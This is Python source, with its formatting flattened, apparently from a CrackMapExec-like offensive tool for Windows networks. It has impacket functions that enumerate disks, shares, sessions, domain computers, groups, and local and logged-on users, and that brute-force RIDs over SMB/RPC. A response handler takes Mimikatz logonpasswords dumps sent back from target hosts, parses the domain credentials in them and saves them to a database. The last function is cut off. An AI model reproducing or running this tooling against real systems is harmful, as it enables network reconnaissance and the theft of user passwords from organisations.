def disks1(smb): """Enumerate disks. *** This does require local admin i think. Made to return nothing if not admin. """ self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) try: #self.logger.info('Attempting to enum disks...') rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\srvsvc', smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('disks Binding start') dce.bind(impacket.dcerpc.v5.srvs.MSRPC_UUID_SRVS) try: logging.debug('Get disks via hNetrServerDiskEnum...') #self.logger.announce('Attempting to enum disks...') resp = impacket.dcerpc.v5.srvs.hNetrServerDiskEnum(dce, 0) self.logger.success('Disks enumerated on {} !'.format( self.host)) for disk in resp['DiskInfoStruct']['Buffer']: if disk['Disk'] != '\x00': #self.logger.results('Disk: {} found on {}'.format(disk['Disk'], self.host)) self.logger.highlight("Found Disk: {}\\ ".format( disk['Disk'])) enumlog += "Found Disk: {}\\ \n".format(disk['Disk']) except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error('Failed to enum disks, are you LocalAdmin?') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Disks_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved Disks output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.info('Finished disk enum') dce.disconnect() return
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.get('Content-Length')) data = response.rfile.read(length) # We've received the response, stop tracking this host response.stop_tracking_host() if len(data): if self.command.find('sekurlsa::logonpasswords') != -1: creds = self.parse_mimikatz(data) if len(creds): for cred_set in creds: credtype, domain, username, password, _, _ = cred_set # Get the hostid from the DB hostid = context.db.get_computers( response.client_address[0])[0][0] context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid) context.log.highlight('{}\\{}:{}'.format( domain, username, password)) context.log.success( "Added {} credential(s) to the database".format( highlight(len(creds)))) else: context.log.highlight(data) #cant use ':' in filename cause of windows log_name = 'Mimikatz_against_{}_on_{}.log'.format( response.client_address[0], datetime.now().strftime("%b.%d.%y_at_%H%M")) write_log(str(data, 'utf-8'), log_name) context.log.info("Saved raw Mimikatz output to {}/{}".format( cfg.LOGS_PATH, log_name))
def group2(smb): """Enum a target group in domain. Prints output and #adds them to cmxdb """ self = smb targetGroup = self.args.group groupFound = False groupLog = '' if targetGroup == '': self.logger.error("Must specify a group name after --group ") return list() #self.logger.announce('Starting Domain Group Enum') try: rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.dc_ip, 445, r'\samr', username=self.username, password=self.password, domain=self.domain) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('Get net groups Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() serverHandle = resp['ServerHandle'] self.logger.debug('Looking up reachable domain(s)') resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] tmpdomain = domains[0]['Name'] logging.debug('Looking up groups in domain: ' + domains[0]['Name']) resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain( dce, domainHandle, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateGroupsInDomain response:') if self.debug: resp.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() for group in resp['Buffer']['Buffer']: gid = group['RelativeId'] r = impacket.dcerpc.v5.samr.hSamrOpenGroup( dce, domainHandle, groupId=gid) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup( dce, r['GroupHandle'], impacket.dcerpc.v5.samr. GROUP_INFORMATION_CLASS.GroupGeneralInformation) #info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER logging.debug( 'Dump of hSamrQueryInformationGroup response:') if self.debug: info.dump() if group['Name'] == targetGroup: self.logger.success( '\"{}\" Domain Group Found in {}'.format( targetGroup, tmpdomain)) self.logger.highlight( " \"{}\" Group Info".format(targetGroup)) groupFound = True self.logger.highlight('Member Count: {}'.format( info['Buffer']['General']['MemberCount'])) groupResp = impacket.dcerpc.v5.samr.hSamrGetMembersInGroup( dce, r['GroupHandle']) logging.debug( 'Dump of hSamrGetMembersInGroup response:') if self.debug: groupResp.dump() for member in groupResp['Members']['Members']: m = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, member) guser = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, m['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) self.logger.highlight('{}\\{:<30} '.format( tmpdomain, guser['Buffer']['All']['UserName'])) groupLog += '{}\\{:<30} \n'.format( tmpdomain, guser['Buffer']['All']['UserName']) logging.debug( 'Dump of hSamrQueryInformationUser2 response:' ) if self.debug: guser.dump() if groupFound is False: self.logger.error("Specified group was not found") impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['GroupHandle']) enumerationContext = resp['EnumerationContext'] status = resp['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error('Failed to enum Domain Groups') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect in group2.a {}'.format(str(e))) self.logger.error( 'Failed to identify the domain controller for {} Can you ping it?'. format(self.domain)) self.logger.error( ' Try adding the switch -dc ip.ad.dr.es with a known DC') self.logger.error( ' or ensure your /etc/resolv.conf file includes target DC(s)') try: dce.disconnect() except: logging.debug('failed disconnect in group2.a') pass return try: dce.disconnect() except: self.logging.error('Failed dce disconnect during groups') pass if self.args.logs and groupFound: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Members_of_{}_on_{}.log'.format(targetGroup, ctime) write_log(str(groupLog), log_name) self.logger.announce("Saved Group Members output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Group Enum') return
def computers1(smb): """Enum Domain Computers. Prints output and adds them to cmxdb """ comps = '' self = smb #self.logger.announce('Starting Domain Computers Enum') if self.args.save: filename = "{}-computers.txt".format(self.domain) savefile = open(filename, "w") try: rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.dc_ip, 445, r'\samr', username=self.username, password=self.password) #domain=self.domain dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('NetUsers Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() serverHandle = resp['ServerHandle'] self.logger.debug('Looking up domain name(s)') resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] tmpdomain = domains[0]['Name'] self.logger.debug('Looking up users in domain:' + domains[0]['Name']) resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: #need one for workstations and second gets the DomainControllers respComps = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain( dce, domainHandle, impacket.dcerpc.v5.samr. USER_WORKSTATION_TRUST_ACCOUNT, enumerationContext=enumerationContext) respServs = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain( dce, domainHandle, impacket.dcerpc.v5.samr.USER_SERVER_TRUST_ACCOUNT, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateUsersInDomain Comps response:' ) if self.debug: respComps.dump() logging.debug( 'Dump of hSamrEnumerateUsersInDomain Servs response:' ) if self.debug: respServs.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() self.logger.success('Domain Controllers enumerated') self.logger.highlight( " {} Domain Controllers".format(tmpdomain)) comps += 'Domain Controllers \n' for user in respServs['Buffer']['Buffer']: #servers r = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, user['RelativeId']) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() # r has the clases defined here: #https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER self.logger.highlight('{:<23} rid: {}'.format( user['Name'], user['RelativeId'])) comps += '{:<23} rid: {} \n'.format( user['Name'], user['RelativeId']) #def add_computer(self, ip='', hostname='', domain=None, os='', dc='No'): self.db.add_computer(hostname=user['Name'][:-1], domain=tmpdomain, dc='Yes') if self.args.save: savefile.write("{}\n".format(user['Name'])) info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, r['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) logging.debug( 'Dump of hSamrQueryInformationUser2 response:') if self.debug: info.dump() impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['UserHandle']) print('') self.logger.success('Domain Computers enumerated') self.logger.highlight( " {} Domain Computer Accounts".format(tmpdomain)) comps += '\nDomain Computers \n' for user in respComps['Buffer']['Buffer']: #workstations r = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, user['RelativeId']) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() # r has the clases defined here: #https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER #self.logger.results('Computername: {:<25} rid: {}'.format(user['Name'], user['RelativeId'])) self.logger.highlight('{:<23} rid: {}'.format( user['Name'], user['RelativeId'])) comps += '{:<23} rid: {}\n'.format( user['Name'], user['RelativeId']) #def add_computer(self, ip='', hostname='', domain=None, os='', dc='No'): self.db.add_computer(hostname=user['Name'][:-1], domain=tmpdomain) if self.args.save: savefile.write("{}\n".format(user['Name'])) info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, r['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) logging.debug( 'Dump of hSamrQueryInformationUser2 response:') if self.debug: info.dump() impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['UserHandle']) enumerationContext = respComps['EnumerationContext'] status = respComps['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error('Failed to enum Domain Computers') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect in computers1.a {}'.format(str(e))) self.logger.error( 'Failed to identify the domain controller for {} Can you ping it?'. format(self.domain)) self.logger.error( ' Try adding the switch -dc ip.ad.dr.es with a known DC') self.logger.error( ' or ensure your /etc/resolv.conf file includes target DC(s)') try: dce.disconnect() except: logging.debug('failed disconnect in computers') pass return if self.args.save: savefile.close() self.logger.success("Computers saved to: {}".format(filename)) try: dce.disconnect() except: self.logging.error('Failed dce disconnect during computers') pass if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Domain_Computers_of_{}_on_{}.log'.format(tmpdomain, ctime) write_log(str(comps), log_name) self.logger.announce("Saved Domain Computers output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Domain Computer Enum') return
def sessions1(smb): """Enumerate sessions. Identifes sessions and their originating host. Using impackets hNetrSessionEnum from https://github.com/SecureAuthCorp/impacket/blob/ec9d119d102251d13e2f9b4ff25966220f4005e9/impacket/dcerpc/v5/srvs.py """ self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) try: #self.logger.announce('Starting Session Enum') rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\srvsvc', smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('netsessions Binding start') dce.bind(impacket.dcerpc.v5.srvs.MSRPC_UUID_SRVS) try: logging.debug('Get netsessions via hNetrSessionEnum...') resp = impacket.dcerpc.v5.srvs.hNetrSessionEnum( dce, '\x00', '\x00', 10 ) #no clue why \x00 is used for client and username?? but it works! for session in resp['InfoStruct']['SessionInfo']['Level10'][ 'Buffer']: userName = session['sesi10_username'][:-1] sourceIP = session['sesi10_cname'][:-1][2:] #self.logger.results('User: {} has session originating from {}'.format(userName, sourceIP)) self.logger.highlight( "{} has session originating from {} on {}".format( userName, sourceIP, self.host, )) enumlog += "{} has session originating from {} on {} \n".format( userName, sourceIP, self.host, ) self.logger.success('Sessions enumerated on {} !'.format( self.host)) except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error( 'Failed to enum Sessions, win10 may require LocalAdmin') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) self.logger.error( 'Failed to enum Sessions, win10 may require LocalAdmin') dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) self.logger.error( 'Failed to enum Sessions, win10 may require LocalAdmin') dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Sessions_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Sessions output saved to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Session Enum') dce.disconnect() return
def shares1(smb): """Enum accessable shares and privileges. OpSec Warning, this attempts to create a randomly named folder on each enumerated share to check for WRITE access. """ self = smb temp_dir = ntpath.normpath("\\" + gen_random_string()) permissions = [] #self.logger.announce('Starting Share Enumeration') enumlog = '' try: for share in self.conn.listShares(): share_name = share['shi1_netname'][:-1] share_remark = share['shi1_remark'][:-1] share_info = { 'name': share_name, 'remark': share_remark, 'access': [] } read = False write = False try: self.conn.listPath(share_name, '\\') read = True share_info['access'].append('READ') except SessionError: pass try: self.conn.createDirectory(share_name, temp_dir) self.conn.deleteDirectory(share_name, temp_dir) write = True share_info['access'].append('WRITE') except SessionError: pass permissions.append(share_info) #self.db.add_share(hostid, share_name, share_remark, read, write) #self.logger.debug('Enumerated shares') self.logger.success('Shares enumerated on: {}'.format(self.host)) self.logger.highlight('{:<15} {:<15} {}'.format( 'Share', 'Permissions', 'Remark')) self.logger.highlight('{:<15} {:<15} {}'.format( '-----', '-----------', '------')) enumlog += 'Executed as {} \n'.format(self.username) enumlog += '{:<15} {:<15} {} \n'.format('Share', 'Permissions', 'Remark') enumlog += '{:<15} {:<15} {} \n'.format('-----', '-----------', '------') for share in permissions: name = share['name'] remark = share['remark'] perms = share['access'] self.logger.highlight('{:<15} {:<15} {}'.format( name, ','.join(perms), remark)) enumlog += '{:<15} {:<15} {} \n'.format(name, ','.join(perms), remark) except Exception as e: self.logger.error('Error enumerating shares: {}'.format(e)) if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Shares_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved Shares output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Share Enumeration') return permissions
def rid_brute1(smb, maxrid=None): """Brute force RIDs.""" self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) logging.debug('Starting RID Brute') if not maxrid: maxrid = int(self.args.rid_brute) try: rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\lsarpc', username=self.username, password=self.password, smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('Brute forcing RIDs') dce.bind(impacket.dcerpc.v5.lsat.MSRPC_UUID_LSAT) try: logging.debug('Open w/ hLsarOpenPolicy2...') resp = impacket.dcerpc.v5.lsad.hLsarOpenPolicy2( dce, impacket.dcerpc.v5.dtypes.MAXIMUM_ALLOWED | impacket.dcerpc.v5.lsat.POLICY_LOOKUP_NAMES) policyHandle = resp['PolicyHandle'] if self.debug: logging.debug('Dump of hLsarOpenPolicy2 response:') resp.dump() resp = impacket.dcerpc.v5.lsad.hLsarQueryInformationPolicy2( dce, policyHandle, impacket.dcerpc.v5.lsad. POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation) domainSid = resp['PolicyInformation'][ 'PolicyAccountDomainInfo']['DomainSid'].formatCanonical() if self.debug: logging.debug( 'Dump of hLsarQueryInformationPolicy2 response:') resp.dump() soFar = 0 SIMULTANEOUS = 1000 self.logger.success("RID's enumerated on: {}".format( self.host)) self.logger.highlight(" RID Information") for j in range(maxrid // SIMULTANEOUS + 1): if (maxrid - soFar) // SIMULTANEOUS == 0: sidsToCheck = (maxrid - soFar) % SIMULTANEOUS else: sidsToCheck = SIMULTANEOUS if sidsToCheck == 0: break sids = list() for i in range(soFar, soFar + sidsToCheck): sids.append(domainSid + '-%d' % i) try: #if self.debug: # this is huge/gross, even for debug # logging.debug('Dump of hLsarLookupSids response:') # resp.dump() resp = impacket.dcerpc.v5.lsat.hLsarLookupSids( dce, policyHandle, sids, impacket.dcerpc.v5.lsat. LSAP_LOOKUP_LEVEL.LsapLookupWksta) except Exception as e: if str(e).find('STATUS_NONE_MAPPED') >= 0: soFar += SIMULTANEOUS continue elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0: resp = e.get_packet() else: raise for n, item in enumerate(resp['TranslatedNames']['Names']): if item['Use'] != impacket.dcerpc.v5.samr.SID_NAME_USE.SidTypeUnknown: rid = soFar + n domain = resp['ReferencedDomains']['Domains'][ item['DomainIndex']]['Name'] user = item['Name'] sid_type = impacket.dcerpc.v5.samr.SID_NAME_USE.enumItems( item['Use']).name self.logger.highlight("{}\\{:<15} :{} ({})".format( domain, user, rid, sid_type)) enumlog += "{}\\{:<15} :{} ({}) \n".format( domain, user, rid, sid_type) soFar += SIMULTANEOUS except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error( 'Failed to Brute force RIDs, are you localadmin?') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'RID-Brute_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved RID Brute output to {}/{}".format( cfg.LOGS_PATH, log_name)) dce.disconnect() logging.debug('Finished RID brute') return
def local_groups1(smb): """Enumerate local groups. Need to figure out if needs localadmin or its a waste of effort """ self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) try: #self.logger.announce('Checking Local Groups') rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\samr', username=self.username, password=self.password, smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('Get net localgroups Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() serverHandle = resp['ServerHandle'] self.logger.debug('Checking host name') resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] tmpdomain = domains[0]['Name'] resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 self.logger.success('Local Groups enumerated on: {}'.format( self.host)) self.logger.highlight(" Local Group Accounts") while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain( dce, domainHandle, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateGroupsInDomain response:') if self.debug: resp.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() for group in resp['Buffer']['Buffer']: gid = group['RelativeId'] r = impacket.dcerpc.v5.samr.hSamrOpenGroup( dce, domainHandle, groupId=gid) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup( dce, r['GroupHandle'], impacket.dcerpc.v5.samr. GROUP_INFORMATION_CLASS.GroupGeneralInformation) #info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER logging.debug( 'Dump of hSamrQueryInformationGroup response:') if self.debug: info.dump() #self.logger.results('Groupname: {:<30} membercount: {}'.format(group['Name'], info['Buffer']['General']['MemberCount'])) self.logger.highlight( 'Group: {:<20} membercount: {}'.format( group['Name'], info['Buffer']['General']['MemberCount'])) enumlog += 'Group: {:<20} membercount: {} \n'.format( group['Name'], info['Buffer']['General']['MemberCount']) groupResp = impacket.dcerpc.v5.samr.hSamrGetMembersInGroup( dce, r['GroupHandle']) logging.debug( 'Dump of hSamrGetMembersInGroup response:') if self.debug: groupResp.dump() for member in groupResp['Members']['Members']: m = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, member) guser = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, m['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) self.logger.highlight('{}\\{:<30} '.format( tmpdomain, guser['Buffer']['All']['UserName'])) enumlog += '{}\\{:<30} \n'.format( tmpdomain, guser['Buffer']['All']['UserName']) logging.debug( 'Dump of hSamrQueryInformationUser2 response:') if self.debug: guser.dump() impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['GroupHandle']) enumerationContext = resp['EnumerationContext'] status = resp['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error( 'Failed to enum Local Groups, are you localadmin?') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Local-Groups_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved Local Groups output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Checking Local Groups') dce.disconnect() return
def local_users1(smb): """Enumerate local users. Need to figure out if needs localadmin or its a waste of effort """ self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) try: #self.logger.announce('Checking Local Users') rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\samr', username=self.username, password=self.password, smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('net local users Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() self.logger.debug('Looking up host name') serverHandle = resp['ServerHandle'] resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] logging.debug('Looking up localusers on: ' + domains[0]['Name']) resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 self.logger.success('Local Users enumerated on {} !'.format( self.host)) self.logger.highlight(" Local User Accounts") while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: resp = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain( dce, domainHandle, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateUsersInDomain response:') if self.debug: resp.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() for user in resp['Buffer']['Buffer']: #users r = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, user['RelativeId']) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() # r has the clases defined here: #https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER #self.logger.results('username: {:<25} rid: {}'.format(user['Name'], user['RelativeId'])) self.logger.highlight("{}\\{:<15} :{} ".format( self.hostname, user['Name'], user['RelativeId'])) self.db.add_user(self.hostname, user['Name']) enumlog += "{}\\{:<15} :{} \n".format( self.hostname, user['Name'], user['RelativeId']) info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, r['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) logging.debug( 'Dump of hSamrQueryInformationUser2 response:') if self.debug: info.dump() impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['UserHandle']) enumerationContext = resp['EnumerationContext'] status = resp['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error( 'Failed to enum Local Users, are you localadmin?') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Local-Users_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved Local Users output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Checking Local Users') dce.disconnect() return
def loggedon1(smb): """Enumerate Loggedon users. I think it requires localadmin, but handles if it doesnt work. """ self = smb enumlog = '' enumlog += 'Executed as {} \n'.format(self.username) try: #self.logger.announce('Checking for logged on users') rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.host, 445, r'\wkssvc', smb_connection=self.conn) dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('loggedon Binding start') dce.bind(impacket.dcerpc.v5.wkst.MSRPC_UUID_WKST) try: logging.debug('Get loggedonUsers via hNetrWkstaUserEnum...') #self.logger.announce('Attempting to enum loggedon users...') resp = impacket.dcerpc.v5.wkst.hNetrWkstaUserEnum( dce, 1 ) # theres a version that takes 0, not sure the difference? self.logger.success('Loggedon-Users enumerated on {} !'.format( self.host)) for wksta_user in resp['UserInfo']['WkstaUserInfo']['Level1'][ 'Buffer']: wkst_username = wksta_user[ 'wkui1_username'][: -1] # These are defined in https://github.com/SecureAuthCorp/impacket/blob/master/impacket/dcerpc/v5/wkst.py#WKSTA_USER_INFO_1 #self.logger.results('User:{} is currently logged on {}'.format(wkst_username,self.host)) self.logger.highlight( "{} is currently logged on {} ({})".format( wkst_username, self.host, self.hostname)) enumlog += "{} is currently logged on {} ({}) \n".format( wkst_username, self.host, self.hostname) except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error( 'Failed to enum Loggedon Users, win10 may require localadmin?' ) dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) 